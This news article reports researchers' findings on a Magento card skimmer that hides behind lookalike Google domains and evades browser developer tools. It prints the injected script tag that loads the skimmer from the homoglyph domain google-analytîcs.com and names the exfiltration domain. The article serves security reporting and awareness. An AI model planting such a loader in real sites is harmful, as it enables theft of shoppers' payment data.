Malicious 'Google' domains used in Magento card skimmer attacks

Visitors to infected sites are being deceived by the ruse.
Written by Charlie Osborne, Contributing Writer

Threat actors are using fake but convincing Google domains to fool website visitors into thinking infected websites are safe when making online transactions. 

On Thursday, researchers from Sucuri said in a recent case reported by a Magento website owner, a domain had been infected with a credit card skimmer making use of JavaScript code containing a link to the malicious internationalized google-analytîcs[.]com website address.

An example of the code is below:

< script type=" text/javascript " src =" //google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js " > < /script>

"Website visitors may see a reputable name (like "Google") in requests and assume that they're safe to load, without noticing that the domain is not a perfect match and is actually malicious in nature," the researchers say. 

TechRepublic: 60% of companies experienced insider attacks in the last year

The website owner was made aware of a problem after being blacklisted. Sucuri's investigation revealed the data capture element of the card skimmer is similar to others in the wild and uses Javascript to covertly siphon and store any input data as well as drop-down menu selections. 

However, the code will change tactics depending on whether developer tools in either the Google Chrome or Mozilla Firefox browser are in use. The skimmer will not attempt to grab any information in these scenarios, which is likely an attempt to avoid detection. 

CNET: Russia targeted elections systems in all 50 states, Senate report says

The card skimmer supports "dozens" of payment gateways, Sucuri says, and if developer tools are not detected, stolen information is sent to a remote server -- once again disguised with another fraudulent domain, google[.]ssl[.]lnfo[.]cc. 

See also: US AG Barr demands tech firms break encryption, 'it can and must be done'

Card skimmers, installed through vulnerable e-commerce websites, are a widespread occurrence. In July, RiskIQ said a recent 'spray-and-pray' campaign proved to be successful for the Magecart hacking group, which had managed to infect over 17,000 websites with card-skimming malware in just a few months.

Magento users, in the same way as WordPress and Drupal, are always advised to keep their software builds up-to-date. Magento domains are a common target of cyberattackers seeking to harvest financial data, with an estimated 83 percent of Magento websites reported as vulnerable to skimmers in 2018.

ZDNet has reached out to Google and will update if we hear back.

These are the worst hacks, cyberattacks, and data breaches of 2019 (so far)

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Editorial standards